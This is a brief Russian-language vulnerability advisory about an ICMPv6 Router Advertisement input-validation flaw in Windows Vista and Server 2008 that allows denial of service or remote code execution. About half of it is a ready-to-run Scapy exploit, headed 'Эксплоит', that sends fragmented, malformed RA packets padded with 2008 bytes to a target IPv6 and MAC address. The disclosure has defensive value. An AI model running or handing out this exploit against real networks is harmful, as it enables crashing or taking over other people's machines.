Программа:
Microsoft Windows Vista
Microsoft Windows Server 2008
Уязвимость позволяет удаленному злоумышленнику осуществить DoS атаку и
выполнить произвольный код на целевой системе. Уязвимость существует из-за
ошибки в проверке входных данных при использовании ICMPv6 Router. Атакующий
может осуществить манипуляцию с Scapy6 пакетами, обработка которых приведет к
отказу в обслуживании или выполнению произвольного кода.
Эксплоит:
v6_dst = "<IPv6 address>"
mac_dst = "<Mac address>"
pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() /
ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") /
Raw(load='A'*2008)
l=fragment6(pkt, 1500)
for p in l:
sendp(Ether(dst=mac_dst)/p, iface="eth0")
